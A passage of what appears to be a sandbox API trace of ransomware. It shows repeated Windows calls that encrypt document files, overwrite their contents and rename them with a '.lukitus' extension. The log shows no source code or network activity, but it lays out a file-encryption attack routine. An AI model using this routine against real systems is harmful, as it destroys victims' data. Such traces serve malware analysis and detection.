"c:\\users\\aetadzjz\\documents\\fwkh\\ehbu75um3wvro9asr.pps"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-3C30F310-5C6049E3F1C5.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-3c30f310-5c6049e3f1c5.lukitus"), dwFlags=0x9) returned 1 [0107.190] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.190] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.196] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x18fd6, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x18fd6, lpOverlapped=0x0) returned 1 [0107.197] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.197] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x18fd6, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x18fd6, lpOverlapped=0x0) returned 1 [0107.197] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.197] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63ea38f0, dwHighDateTime=0x1d31760)) [0107.197] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.198] FlushFileBuffers (hFile=0x324) returned 1 [0107.202] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\fc7shkFFqXcMBE_pu.docx" (normalized: "c:\\users\\aetadzjz\\documents\\fc7shkffqxcmbe_pu.docx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee7ae50, ftCreationTime.dwHighDateTime=0x1d29311, ftLastAccessTime.dwLowDateTime=0xe3389f30, ftLastAccessTime.dwHighDateTime=0x1d28d4e, ftLastWriteTime.dwLowDateTime=0xe3389f30, ftLastWriteTime.dwHighDateTime=0x1d28d4e, nFileSizeHigh=0x0, nFileSizeLow=0x12e7a)) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.202] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\fc7shkFFqXcMBE_pu.docx" (normalized: "c:\\users\\aetadzjz\\documents\\fc7shkffqxcmbe_pu.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.202] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\fc7shkFFqXcMBE_pu.docx" (normalized: "c:\\users\\aetadzjz\\documents\\fc7shkffqxcmbe_pu.docx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-88736A33-A73FD1B5DB9A.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-88736a33-a73fd1b5db9a.lukitus"), dwFlags=0x9) returned 1 [0107.204] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.204] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.209] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x12e7a, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x12e7a, lpOverlapped=0x0) returned 1 [0107.210] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.210] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x12e7a, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x12e7a, lpOverlapped=0x0) returned 1 [0107.210] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.210] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63ec9a50, dwHighDateTime=0x1d31760)) [0107.210] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.210] FlushFileBuffers (hFile=0x324) returned 1 [0107.213] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\k5jcwCH7962.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\k5jcwch7962.rtf"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41e54460, ftCreationTime.dwHighDateTime=0x1d2feac, ftLastAccessTime.dwLowDateTime=0x17d6a4e0, ftLastAccessTime.dwHighDateTime=0x1d2f65d, ftLastWriteTime.dwLowDateTime=0x17d6a4e0, ftLastWriteTime.dwHighDateTime=0x1d2f65d, nFileSizeHigh=0x0, nFileSizeLow=0x9b2d)) returned 1 [0107.213] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.213] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.213] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.213] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.214] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\k5jcwCH7962.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\k5jcwch7962.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.214] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\k5jcwCH7962.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\k5jcwch7962.rtf"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-49600478-A7543DF24F7D.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-49600478-a7543df24f7d.lukitus"), dwFlags=0x9) returned 1 [0107.215] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.215] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.221] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x9b2d, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x9b2d, lpOverlapped=0x0) returned 1 [0107.222] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.222] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x9b2d, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x9b2d, lpOverlapped=0x0) returned 1 [0107.222] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.222] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63eefbb0, dwHighDateTime=0x1d31760)) [0107.222] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.222] FlushFileBuffers (hFile=0x324) returned 1 [0107.226] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Clg5pDW.docx" (normalized: "c:\\users\\aetadzjz\\documents\\clg5pdw.docx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x307163c0, ftCreationTime.dwHighDateTime=0x1d2f65b, ftLastAccessTime.dwLowDateTime=0xcd9d3360, ftLastAccessTime.dwHighDateTime=0x1d3011c, ftLastWriteTime.dwLowDateTime=0xcd9d3360, ftLastWriteTime.dwHighDateTime=0x1d3011c, nFileSizeHigh=0x0, nFileSizeLow=0x4ef9)) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.226] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Clg5pDW.docx" (normalized: "c:\\users\\aetadzjz\\documents\\clg5pdw.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.226] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Clg5pDW.docx" (normalized: "c:\\users\\aetadzjz\\documents\\clg5pdw.docx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-7B6AFC43-B245CC6E1DD0.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-7b6afc43-b245cc6e1dd0.lukitus"), dwFlags=0x9) returned 1 [0107.229] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.229] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.235] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x4ef9, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x4ef9, lpOverlapped=0x0) returned 1 [0107.236] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.236] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x4ef9, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x4ef9, lpOverlapped=0x0) returned 1 [0107.236] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.237] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63f15d10, dwHighDateTime=0x1d31760)) [0107.237] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.237] FlushFileBuffers (hFile=0x324) returned 1 [0107.241] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\cqM03WsMqvf.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\cqm03wsmqvf.rtf"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3cf70a0, ftCreationTime.dwHighDateTime=0x1d302bc, ftLastAccessTime.dwLowDateTime=0x5da56c20, ftLastAccessTime.dwHighDateTime=0x1d3056e, ftLastWriteTime.dwLowDateTime=0x5da56c20, ftLastWriteTime.dwHighDateTime=0x1d3056e, nFileSizeHigh=0x0, nFileSizeLow=0x63dd)) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.241] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.242] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.242] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.242] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.242] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\cqM03WsMqvf.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\cqm03wsmqvf.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.242] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\cqM03WsMqvf.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\cqm03wsmqvf.rtf"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-026B0F52-B0EE23B731C2.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-026b0f52-b0ee23b731c2.lukitus"), dwFlags=0x9) returned 1 [0107.243] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.243] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.249] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x63dd, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x63dd, lpOverlapped=0x0) returned 1 [0107.249] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.249] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x63dd, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x63dd, lpOverlapped=0x0) returned 1 [0107.250] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.250] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63f3be70, dwHighDateTime=0x1d31760)) [0107.250] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.250] FlushFileBuffers (hFile=0x324) returned 1 [0107.253] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\jrZUr62deGwb.docx" (normalized: "c:\\users\\aetadzjz\\documents\\jrzur62degwb.docx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f70a990, ftCreationTime.dwHighDateTime=0x1d304e8, ftLastAccessTime.dwLowDateTime=0xbaf73f50, 